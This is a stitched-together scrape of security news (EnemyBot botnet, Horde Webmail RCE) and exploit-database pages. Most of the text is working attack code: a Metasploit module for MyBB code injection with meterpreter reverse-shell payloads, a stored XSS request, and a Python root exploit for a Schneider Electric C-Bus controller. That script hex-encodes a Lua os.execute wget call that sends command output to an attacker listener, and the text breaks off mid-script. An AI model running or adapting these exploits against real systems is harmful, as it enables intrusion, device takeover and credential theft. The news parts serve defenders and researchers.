EnemyBot DDoS botnet is rapidly weaponizing security bugs disclosed in CMS systems like WordPress plug-ins, Android devices, commercial Web servers, and other enterprise applications.

An Internet of Things (IoT) botnet dubbed “EnemyBot" is expanding its front lines to target security vulnerabilities in enterprise services — potentially leading to it being a much more virulent threat than it has been, researchers say.

EnemyBot, which is controlled by a threat actor known as Keksec, is a Linux botnet that emerged on the malware scene in late March. It shares source code with two other well-known botnets, Gafgyt (aka Bashlite) and the mighty Mirai, according to a prior analysis from Fortinet. Like those threats, EnemyBot is used to carry out distributed denial-of-service (DDoS) attacks. Other aspects of the code include smaller elements from Qbot and other malware, and some custom development.

While it began life focusing on adding IoT devices and routers to its botnet footprint, EnemyBot has now evolved to add remote code execution (RCE) exploits for a host of popular business applications, including VMware Workspace ONE, Adobe ColdFusion, WordPress sites (via vulnerable plug-ins like Video Synchro PDF), PHP Scriptcase, and others, according to researchers at AT&T Labs. 

Researchers discovered that the group is using a mix of recent, so-called "one-day" bugs, as well as older known issues, looking to take advantage in lags in patching.

Keksec is "now targeting IoT devices, web servers, Android devices and content management system (CMS) servers," according to the firm's recent report, which notes that the latest version of EnemyBot adds a webscan function containing a total of 24 exploits to attack vulnerabilities of different devices and Web servers and self-propagate. 

The enterprise-focused exploits that were recently added include:

*   Log4Shell vulns: CVE-2021-44228, CVE-2021-45046
*   F5 BIG IP devices: CVE-2022-1388
*   Spring Cloud Gateway: CVE-2022-22947
*   TOTOLink A3000RU wireless router: CVE-2022-25075
*   Kramer VIAWare: CVE-2021-35064
*   PHP Scriptcase: No CVE yet assigned
*   Adobe ColdFusion 11: No CVE yet assigned

"The nature of devices and systems targeted through EnemyBot is different than vulnerabilities aimed at corporate datacenters," Bud Broomhead, CEO at Viakoo, tells Dark Reading. "WordPress installations, Android devices, IoT devices and other targets for EnemyBot are all widely deployed (therefore might be hard to find), are operated by organizations of all sizes, and are often managed by lines of business that lack cybersecurity skills."

**EnemyBot: A Super Soldier?**

In addition to the DDoS capabilities, EnemyBot can also receive commands to download and execute new code that could add to its functions or update its vulnerability list, according to the analysis. This means that, worryingly, the malware can adopt new vulnerabilities within days of those issues being discovered, researchers warned, as seen when it added a bug tracked as CVE-2022-22954 affecting VMware Workspace ONE, almost immediately after disclosure.

Sean Malone, CISO at Demandbase, says that given its rapid development, EnemyBot and others like it present a new urgency for enterprise defenders.

"The rapid weaponization of newly released vulnerabilities highlights the need to be able to patch almost instantaneously when new vulnerabilities are identified," he tells Dark Reading. "We should assume that every piece of software, every application development framework, and every IoT device will have a critical vulnerability identified at some point. Our architectures should be designed to limit the available attack surface, and mitigate the blast radius of a compromised system through defense-in-depth measures."

That should include adding the ability to profile systems and network traffic to know what normal looks like, and alert when the system activity and network traffic deviates from that baseline, he adds.

"This botnet emphasizes the need for rapid patching of internet facing devices and the risks of running apps in the cloud," says John Bambenek, principal threat hunter at Netenrich. "This traffic is easily spotted on the wire, but in typical cloud deployments, organizations aren’t able to run network intrusion detection. If organizations aren’t running NIDS or rapidly patching, they are both blind and vulnerable."

**Keksec & EnemyBot's Future**

For its part, Keksec is a well-resourced group that has been around since 2016, making a name for itself by creating various botnets-for-hire. It's known for exploiting vulnerabilities to invade multiple architectures with polymorphic tools (these can include Linux and Windows payloads, as well as custom Python malware), in order to accomplish everything from DDoS to cryptomining to espionage.

For instance, last year the operators made headlines with the "Simps" botnet, which was built for DDoS attacks on gaming targets. Another of its creations is the HybridMQ-keksec botnet, a Frankenstein-like effort created by combining and modifying the source code of Mirai and Gafgyt, just like EnemyBot.

Keksec is constantly adding to its arsenal, and "has the ability to update and add new capabilities to its arsenal of malware on a daily basis," the AT&T Labs researchers note. And indeed, with the new ability to compromise enterprise services and devices, EnemyBot could be poised to ramp up the volume of its attacks.

"In addition, the malware base source code can now be found online on GitHub, making it widely accessible," according to AT&T Labs, whose researchers also note that this won't be the only new EnemyBot variant to bubble up from Keksec's laboratory. "The developer of the GitHub page on EnemyBot self-describes as a 'full time malware dev,' that is also available for contract work."

That spells swelling attack volumes, researchers warn.

"Being available through GitHub means that many types of threat actors, from professional cybercriminals to amateurs, will be able to adapt EnemyBot into new and multiple variants," says Broomhead. "Without question, this is a red-lights-flashing warning sign for organizations to improve their discovery, threat assessment, and remediation capabilities."

EnemyBot Puts Enterprises in the Crosshairs With Raft of '1-Day' Bugs

CSRF exploit requires user to open malicious email

CSRF exploit requires user to open malicious email

A zero-day vulnerability in Horde Webmail enables attackers to take over the web server and pivot to compromising an organization’s other services, according to security researchers.

Documented by Swiss security firm Sonar (formerly SonarSource), the flaw’s abuse relies on an authenticated user of the targeted instance opening a malicious email sent by the attacker.

If they do so, they inadvertently trigger the exploit by executing arbitrary code on the underlying server.

**Abandonware**

A patch for the remote code execution (RCE) vulnerability in the open source platform may never surface given that the current version, which contains the flaw, has been flagged by the maintainers as the final release.

Sonar researchers have therefore advised users to abandon Horde Webmail.

Catch up on the latest cybersecurity research

Johannes Dahse, head of R&D at Sonar, said that a Shodan search had revealed more than 3,000 exposed Horde instances worldwide.

“Furthermore, it is integrated into cPanel,” he told The Daily Swig. “As webmail software does not need to be exposed to the internet, we believe that there are even more, internal instances. These instances can still be exploited as long as the email server of an organization is exposed.”

Horde Webmail, which is part of the Horde groupware, provides a browser-based email client and a server that acts as a proxy to the organization’s email server.

By compromising webmail servers, attackers “can intercept every sent and received email, access password-reset links, sensitive documents, impersonate personnel and steal all credentials of users logging into the webmail service,” according to a Sonar blog post by Simon Scannell, vulnerability researcher at Sonar.

**CSRF**

The Horde Webmail vulnerability (CVE-2022-30287) can be abused with a single request, which brings cross-site request forgery (CSRF) into play. “As a result, an attacker can craft a malicious email and include an external image that when rendered exploits the CSRF vulnerability,” Scannell explained.

Worse still, the victim’s clear-text credentials are also leaked to the attacker, potentially giving the adversary access to additional services used by the target organization – as demonstrated in the proof-of-concept video below.

The vulnerability exists in Horde Webmail’s default configuration and potentially lends itself to mass-exploitation, Sonar warns.

It alerted maintainers to the issue on February 2 and disclosed the flaw today (June 1), having notified the maintainers on May 3 that the 90-day disclosure deadline had passed.

Nevertheless, on March 2 Horde released a fix for a separate issue reported previously by Sonar and acknowledged the latest vulnerability report, according to Sonar.

**Salutary lesson**

The researchers point towards a lesson offered by the vulnerability, noting that it exists in PHP code, which typically uses dynamic types.

“In this case, a security sensitive branch was entered if a user-controlled variable was of the type array,” Scannell said. “We highly discourage developers from making security decisions based on the type of a variable, as it is often easy to miss language-specific quirks.”

Sonar last year documented a chained exploit in another open source webmail platform, Zimbra, that allowed unauthenticated attackers to gain control of Zimbra servers.

YOU MIGHT ALSO LIKE Patch released for cross-domain cookie leakage flaw in Guzzle

Horde Webmail contains zero-day RCE bug with no patch on the horizon

This Metasploit module exploits an improper input validation vulnerability in MyBB versions prior to 1.8.30 to execute arbitrary code in the context of the user running the application. The MyBB Admin Control setting page calls the PHP eval function with unsanitized user input. The exploit adds a new setting, injecting the payload in the vulnerable field, and triggers its execution with a second request. Finally, it takes care of cleaning up and removes the setting. Note that authentication is required for this exploit to work and the account must have rights to add or update settings (typically, the myBB administrator role).

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Powershell  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'MyBB Admin Control Code Injection RCE',        'Description' => %q{          This exploit module leverages an improper input validation          vulnerability in MyBB prior to `1.8.30` to execute arbitrary code in          the context of the user running the application.          MyBB Admin Control setting page calls PHP `eval` function with an          unsanitized user input. The exploit adds a new setting, injecting the          payload in the vulnerable field, and triggers its execution with a          second request. Finally, it takes care of cleaning up and removes the          setting.          Note that authentication is required for this exploit to work and the          account must have rights to add or update settings (typically, myBB          administrator role).        },        'License' => MSF_LICENSE,        'Author' => [          'Cillian Collins', # vulnerability research          'Altelus', # original PoC          'Christophe De La Fuente' # MSF module        ],        'References' => [          [ 'URL', 'https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f'],          [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-22-503/'],          [ 'URL', 'https://github.com/Altelus1/CVE-2022-24734'],          [ 'CVE', '2022-24734']        ],        'Platform' => %w[php unix linux win],        'Privileged' => false,        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },              'Type' => :in_memory            }          ],          [            'Unix (In-Memory)',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_php_ssl' },              'Type' => :in_memory            }          ],          [            'Linux (Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },              'Type' => :dropper            }          ],          [            'Windows (In-Memory)',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' },              'Type' => :in_memory            }          ],          [            'Windows (Dropper)',            {              'Platform' => 'win',              'Arch' => [ARCH_X86, ARCH_X64],              'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },              'Type' => :dropper            }          ]        ],        'DisclosureDate' => '2022-03-09',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('USERNAME', [ true, 'MyBB Admin CP username' ]),        OptString.new('PASSWORD', [ true, 'MyBB Admin CP password' ]),        OptString.new('TARGETURI', [ true, 'The URI of the MyBB application', '/'])      ]    )  end  def check    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'GET',      'vars_get' => { 'intcheck' => 1 }    })    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200    # see https://github.com/mybb/mybb/blob/feature/inc/class_core.php#L307-L310    unless res.body.include?('MYBB')      return CheckCode::Unknown("#{peer} - Cannot find MyBB forum running at #{target_uri.path}")    end    print_good("MyBB forum found running at #{target_uri.path}")    return CheckCode::Detected  end  def login    vprint_status('Attempting login')    cookie_jar.cleanup(true)    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/admin/index.php'),      'method' => 'POST',      'keep_cookies' => true,      'vars_post' => {        'username' => datastore['USERNAME'],        'password' => datastore['PASSWORD'],        'do' => 'login'      }    })    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?    unless res.body.match(/Logged in as .*#{datastore['USERNAME']}/)      fail_with(Failure::NoAccess, "#{peer} - Invalid credentials")    end    print_good('Login successful!')  end  def send_config_settings(method: 'GET', action: 'add', vars_get: {}, vars_post: {}, check_response: true)    req_hash = {      'uri' => normalize_uri(target_uri.path, '/admin/index.php'),      'method' => method,      'vars_get' => {        'module' => 'config-settings',        'action' => action      }.merge(vars_get)    }    req_hash['vars_post'] = vars_post unless vars_post.blank?    res = send_request_cgi(req_hash, datastore['WfsDelay'] > 0 ? datastore['WfsDelay'] : 2)    if check_response && res.nil?      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response")    end    res  end  def exploit    login    res = send_config_settings    if res.body.include?('Access Denied')      fail_with(Failure::NoAccess, "#{peer} - Supplied user doesn't have the rights to add a setting")    end    vprint_status('Adding a malicious settings')    doc = res.get_html_document    @my_post_key = doc.xpath('//input[@name="my_post_key"]/@value').text    case target['Type']    when :in_memory      execute_command(payload.encoded)    when :dropper      execute_cmdstager    end  end  def send_payload(cmd)    vprint_status('Adding a crafted configuration setting entry with the payload')    cmd = cmd.gsub(/\\/, '\\' => '\\\\')    cmd = cmd.gsub(/"/, '"' => '\\"')    cmd = cmd.gsub(/\$/, '$' => '\\$')    case target['Platform']    when 'php'      extra = "\" . eval(\"#{cmd}\") .\""    when 'win'      if target['Arch'] == ARCH_CMD        # Force cmd to run in the background (only works for `cmd`)        extra = "\" . pclose(popen(\"start /B #{cmd}\", \"r\")) .\""      else        extra = "\" . system(\"#{cmd}\") .\""      end    else      extra = "\" . system(\"#{cmd} > /dev/null &\") .\""    end    post_data = {      my_post_key: @my_post_key,      title: Rex::Text.rand_text_alpha(rand(8...16)),      description: Rex::Text.rand_text_alpha(rand(8...16)),      gid: 1,      disporder: '',      name: Rex::Text.rand_text_alpha(rand(8...16)),      type: "\tphp",      extra: extra,      value: Rex::Text.rand_text_alpha(rand(8...16))    }    res = send_config_settings(method: 'POST', vars_post: post_data)    unless res.code == 302      doc = res.get_html_document      err = doc.xpath('//div[@class="error"]').text      fail_with(Failure::Unknown,                "#{peer} - The module expected a 302 response but received: "\                "#{res.code}. Exploit didn't work.#{" Reason: #{err}" if err.present?}")    end    vprint_good('Payload successfully sent')  end  def trigger_payload    vprint_status('Triggering the payload execution')    # We're not expecting response to this query    send_config_settings(action: 'change', check_response: false)  end  def remove_setting    vprint_status('Removing the configuration setting')    vprint_status('Grab the delete parameters')    res = send_config_settings(action: 'manage')    if res.body.include?('<title>MyBB Control Panel - Login</title>')      # this exploit seems to logout users sometimes, so, try to login again and retry      print_status('User session is not valid anymore. Trying to login again to cleanup')      login      res = send_config_settings(action: 'manage')    end    doc = res.get_html_document    control_links = doc.xpath('//div[@class="popup_item_container"]/a/@href')    uri = control_links.detect do |href|      href.text.include?('action=delete') && href.text.include?("my_post_key=#{@my_post_key}")    end    if uri.nil?      print_warning("#{peer} - URI not found in `Modify Settings` page - cannot cleanup")      return    end    vprint_status('Send the delete request')    params = uri.text.split('?')[1]    get_data = CGI.parse(params).transform_values(&:join)    send_config_settings(method: 'POST', vars_get: get_data)  end  def execute_command(cmd, _opt = {})    send_payload(cmd)    trigger_payload    remove_setting    print_status('Shell incoming...')  endend

MyBB Admin Control Remote Code Execution

Fast Food Ordering System version 1.0 suffers from a persistent cross site scripting vulnerability.

    ## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting## Author: Ashish Kumar## Date: 05.31.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software:https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html## Reference:https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6#Description：#The Line 255 of Master.php sends unvalidated data to a web browser, whichcan result in the browser executing malicious code.#echo $Master->save_category();#PoC：POST /ffos/classes/Master.php?f=save_category HTTP/1.1Host: localhostContent-Length: 480sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarySmYVeqOBMhcSziZMX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/ffos/admin/?page=categoriesAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcjConnection: close------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="id"10------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="name"XSS------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="description"Testing XSS "><img src="" onerror="alert(document.cookie)">------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="status"1------WebKitFormBoundarySmYVeqOBMhcSziZM--

Fast Food Ordering System 1.0 Cross Site Scripting

Malware borrows generously from code used by other botnets such as Mirai, Qbot and Zbot.

Malware borrows generously from code used by other botnets such as Mirai, Qbot and Zbot.

A rapidly evolving IoT malware dubbed “EnemyBot” is targeting content management systems (CMS), web servers and Android devices. Threat actor group “Keksec” is believed behind the distribution of the malware, according to researchers.

“Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices,” reported AT&T Alien labs in a recent post. “The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,” they added.

 According to AT&T’s analysis of the malware‘s code base, EnemyBot borrows generously from code used by other botnets such as Mirai, Qbot and Zbot. The Keksec group distributes the malware by targeting Linux machines and IoT devices, this threat group was formed back in 2016 and includes several botnet actors.

****EnemyBot Working****

The Alien lab research team study found four main sections of the malware.

The first section is a python script ‘cc7.py’, used to download all dependencies and compile the malware into different OS architectures (x86, ARM, macOS, OpenBSD, PowerPC, MIPS). After compilation, a batch file “update.sh” is created and used to spread the malware to vulnerable targets.

The second section is the main botnet source code, which includes all the other functionality of the malware excluding the main part and incorporates source codes of the various botnets that can combine to perform an attack.

The third module is obfuscation segment “hide.c” and is compiled and executed manually to encode /decode the malware strings. A simple swap table is used to hide strings and “each char is replaced with a corresponding char in the table” according to researchers.

The last segment includes a command-and-control (CC) component to receive vital actions and payloads from attackers.

AT&T researcher’s further analysis revealed a new scanner function to hunt vulnerable IP addresses and an “adb\_infect” function that is used to attack Android devices.

ADB or Android Debug Bridge is a command-line tool that allows you to communicate with a device.

“In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing shell command,” said the researcher.

“Keksec’s EnemyBot appears to be just starting to spread, however due to the authors’ rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,” the researchers added.

This Linux-based botnet EnemyBot was first discovered by Securonix in March 2022, and later in-depth analysis was done by Fortinet.

****Vulnerabilities Currently Exploited by EnemyBot****

The AT&T researchers release a list of vulnerabilities that are currently exploited by the Enemybot, some of them are not assigned a CVE yet.

The list includes Log4shell vulnerability (CVE-2021-44228, CVE-2021-45046), F5 BIG IP devices (CVE-2022-1388), and others. Some of the vulnerabilities were not assigned a CVE yet such as PHP Scriptcase and Adobe ColdFusion 11.

*   Log4shell vulnerability – CVE-2021-44228, CVE-2021-45046
*   F5 BIG IP devices – CVE-2022-1388
*   Spring Cloud Gateway – CVE-2022-22947
*   TOTOLink A3000RU wireless router – CVE-2022-25075
*   Kramer VIAWare – CVE-2021-35064

“This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread,” the researcher explained.

****Recommended Actions** **

The Alien lab researcher suggests methods to protect from the exploitation. Users are advised to use a properly configured firewall and focus on reducing Linux server and IOT devices’ exposure to the internet.

Another action recommended is to monitor the network traffic, scan the outbound ports and look for the suspicious bandwidth usage. Software should be updated automatically and patched with the latest security update.

EnemyBot Malware Targets Web Servers, CMS Tools and Android OS

Schneider Electric C-Bus Automation Controller (5500SHAC) version 1.10 suffers from an authenticated arbitrary command execution vulnerability. An attacker can abuse the Start-up (init) script editor and exploit the script POST parameter to insert malicious Lua script code and execute commands with root privileges that will grant full control of the device.

    #!/usr/bin/env python3# -*- coding: utf-8 -*-### Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit### Vendor: Schneider Electric SE# Product web page: https://www.se.com | https://www.clipsal.com# Product details:# - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC# - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/# Affected version: CLIPSAL 5500SHAC (i.MX28)#                   CLIPSAL 5500NAC (i.MX28)#                   SW: 1.10.0, 1.6.0#                   HW: 1.0#                   Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2#                   SpaceLogic C-Bus## Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser# for C-Bus Automation Controller (5500SHAC)) is an advanced controller from# Schneider Electric. It is specifically designed to unite the C-Bus home# automation solution with common household communication protocols, from# lighting and climate control, to security, entertainment and energy metering.# The Wiser for C-Bus Automation Controller manages and controls C-Bus systems# for residential homes or zones within a building and integrates functions# such as heating/cooling, energy/load monitoring and remote control for C-Bus# and Modbus.## Desc: The automation controller suffers from an authenticated arbitrary# command execution vulnerability. An attacker can abuse the Start-up (init)# script editor and exploit the 'script' POST parameter to insert malicious# Lua script code and execute commands with root privileges that will grant# full control of the device.## ------------------------------------------------------------------------------# $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888# ----------------------------------------------------------------------# Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38# [*] Starting exfiltration handler on port 8888# [*] Writing Lua initscript... done.# [*] Running os.execute()... done.# [*] Got request from 192.168.0.10:33522# [*] Printing target's request:## b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user# 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption# password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection:# close\r\n\r\n"## [*] Cleaning up... done.## $ # ------------------------------------------------------------------------------## Tested on: CPU model: ARM926EJ-S rev 5 (v5l)#            GNU/Linux 4.4.115 (armv5tejl)#            LuaJIT 2.0.5#            FlashSYS v2#            nginx### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2022-5707# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php### 12.03.2022#import threading#!import datetime##!import requests##!import socket####!import time######!import sys#######!import re########!from requests.auth import HTTPBasicAuthfrom time import sleep as spikajclass Wiser:    def __init__(self):        self.headers = None        self.uri = '/scada-main/scripting/'        self.savs = self.uri + 'save'        self.runs = self.uri + 'run'        self.start = datetime.datetime.now()        self.start = self.start.strftime('%d.%m.%Y %H:%M:%S')        self.creds = HTTPBasicAuth('admin', 'admin123')    def memo(self):        if len(sys.argv) != 5:            self.use()        else:            self.target = sys.argv[1]            self.execmd = sys.argv[2]            self.localh = sys.argv[3]            self.localp = int(sys.argv[4])            if not 'http' in self.target:                self.target = 'http://{}'.format(self.target)    def exfil(self):        print('[*] Starting exfiltration handler on port {}'.format(self.localp))        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        s.bind(('0.0.0.0', self.localp))        while True:            try:                s.settimeout(9)                s.listen(1)                conn, addr = s.accept()                print('[*] Got request from {}:{}'.format(addr[0], addr[1]))                data = conn.recv(2003)                print('[*] Printing target\'s request:')                print('\n%s' %data)            except socket.timeout as p:                print('[!] Something\'s not right. Check your port mappings!')            break        s.close()        self.clean()    def mtask(self):        konac = threading.Thread(name='thricer.exe', target=self.exfil)        konac.start()        self.byts()    def byts(self):        self.headers = {            'Referer':self.target+'/scada-main/main/editor?id=initscript',            'Sec-Ch-Ua':'"(Not(A:Brand";v="8", "Chromium";v="98"',            'Cookie':'x-logout=0; x-auth=; x-login=1; pin=',            'Content-Type':'text/plain;charset=UTF-8',            'User-Agent':'SweetHomeAlabama/2003.59',            'X-Requested-With':'XMLHttpRequest',            'Accept-Language':'en-US,en;q=0.9',            'Accept-Encoding':'gzip, deflate',            'Sec-Ch-Ua-Platform':'"Windows"',            'Sec-Fetch-Site':'same-origin',            'Connection':'keep-alive',            'Sec-Fetch-Dest':'empty',            'Sec-Ch-Ua-Mobile':'?0',            'Sec-Fetch-Mode':'cors',            'Origin':self.target,            'Accept':'*/*',            'sec-gpc':'1'            }            self.loada  = '\x64\x61\x74\x61\x3D\x7B'                                                                     # data={        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x34\x22\x3A\x22\x22\x2C'                 # "ext-comp-1004":"",        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35\x22\x3A\x22\x22\x2C'                 # "ext-comp-1005":"",        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x22\x3A\x22\x22\x2C'                 # "ext-comp-1006":"",        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x37\x22\x3A\x22\x22\x2C'                 # "ext-comp-1007":"",        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x38\x22\x3A\x22\x22\x2C'                 # "ext-comp-1008":"",        self.loada += '\x22\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70\x2D\x73\x65\x61\x72\x63\x68\x22\x3A\x22\x22\x2C' # "scada-help-search":"",        self.loada += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x2C'                     # "id":"initscript",        self.loada += '\x22\x73\x63\x72\x69\x70\x74\x22\x3A\x6E\x75\x6C\x6C\x2C'                                     # "script":null,        self.loada += '\x22\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C\x79\x22\x3A\x22\x74\x72\x75\x65\x22\x7D'             # "scriptonly":"true"}        self.loada += '\x26\x73\x63\x72\x69\x70\x74\x3D\x6F\x73\x2E\x65\x78\x65\x63\x75\x74\x65'                     # &script=os.execute        self.loada += '\x28\x27\x77\x67\x65\x74\x20\x2D\x55\x20\x22\x60'                                             # ('wget -U "`        self.loada += self.execmd                                                                                    # [command input]        self.loada += '\x60\x22\x20'                                                                                 # `".        self.loada += self.localh+':'+str(self.localp)                                                               # [listener input]        self.loada += '\x27\x29'                                                                                     # ')        self.loadb  = '\x64\x61\x74\x61\x3D\x7B'                                                                     # data={        self.loadb += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x7D'                     # "id":"initscript"}                print('[*] Writing Lua initscript... ', end='')        sys.stdout.flush()        spikaj(0.7)        htreq = requests.post(self.target+self.savs, data=self.loada, headers=self.headers, auth=self.creds)        if not 'success' in htreq.text:            print('didn\'t work!')            exit(17)        else:            print('done.')                print('[*] Running os.execute()... ', end='')        sys.stdout.flush()        spikaj(0.7)        htreq = requests.post(self.target+self.runs, data=self.loadb, headers=self.headers, auth=self.creds)        if not 'success' in htreq.text:            print('didn\'t work!')            exit(19)        else:            print('done.')    def splash(self):        Baah_loon = '''     ######   ##########  ######    _\_  ##===----[.].]  #(     ,   _\\   #      )\__|    \        /     `-._``-'        >@         |         |         |         |         |  Schneider Electric C-Bus SmartHome Automation Controller         |        Root Remote Code Execution Proof of Concept         |                       ZSL-2022-5707         |         |         |        '''        print(Baah_loon)    def use(self):        self.splash()        print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]')        exit(0)    def clean(self):        print('\n[*] Cleaning up... ', end='')        sys.stdout.flush()        spikaj(0.7)        self.headers = {'X-Requested-With':'XMLHttpRequest'}        self.blank  = '\x64\x61\x74\x61\x3D\x25\x37\x42\x25\x32\x32'        self.blank += '\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30'        self.blank += '\x30\x34\x25\x32\x32\x25\x33\x41\x25\x32\x32'        self.blank += '\x25\x32\x32\x25\x32\x43\x25\x32\x32\x65\x78'        self.dlank  = '\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35'        self.dlank += '\x25\x32\x32\x25\x33\x41\x25\x32\x32\x25\x32'        self.dlank += '\x32\x25\x32\x43\x25\x32\x32\x65\x78\x74\x2D'        self.dlank += '\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x25\x32'        self.clank  = '\x32\x25\x33\x41\x25\x32\x32\x25\x32\x32\x25'        self.clank += '\x32\x43\x25\x32\x32\x65\x78\x74\x2D\x63\x6F'        self.clank += '\x6D\x70\x2D\x31\x30\x30\x37\x25\x32\x32\x25'        self.clank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'        self.slank  = '\x25\x32\x32\x65\x78\x74\x2D\x63\x6F\x6D\x70'        self.slank += '\x2D\x31\x30\x30\x38\x25\x32\x32\x25\x33\x41'        self.slank += '\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25\x32'        self.slank += '\x32\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70'        self.glank  = '\x2D\x73\x65\x61\x72\x63\x68\x25\x32\x32\x25'        self.glank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'        self.glank += '\x25\x32\x32\x69\x64\x25\x32\x32\x25\x33\x41'        self.glank += '\x25\x32\x32\x69\x6E\x69\x74\x73\x63\x72\x69'        self.hlank  = '\x70\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32'        self.hlank += '\x73\x63\x72\x69\x70\x74\x25\x32\x32\x25\x33'        self.hlank += '\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25'        self.hlank += '\x32\x32\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C'        self.flank  = '\x79\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74'        self.flank += '\x72\x75\x65\x25\x32\x32\x25\x37\x44'#######'        self.clear = f'{self.blank}{self.dlank}{self.clank}{self.slank}{self.glank}{self.hlank}{self.flank}'        htreq = requests.post(self.target+self.savs, data=self.clear, headers=self.headers, auth=self.creds)        if not 'success' in htreq.text:            print('didn\'t work!')            exit(18)        else:            print('done.')            exit(-1)    def main(self):        print('-'*70)        print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start)        self.memo(), self.mtask()if __name__ == '__main__':   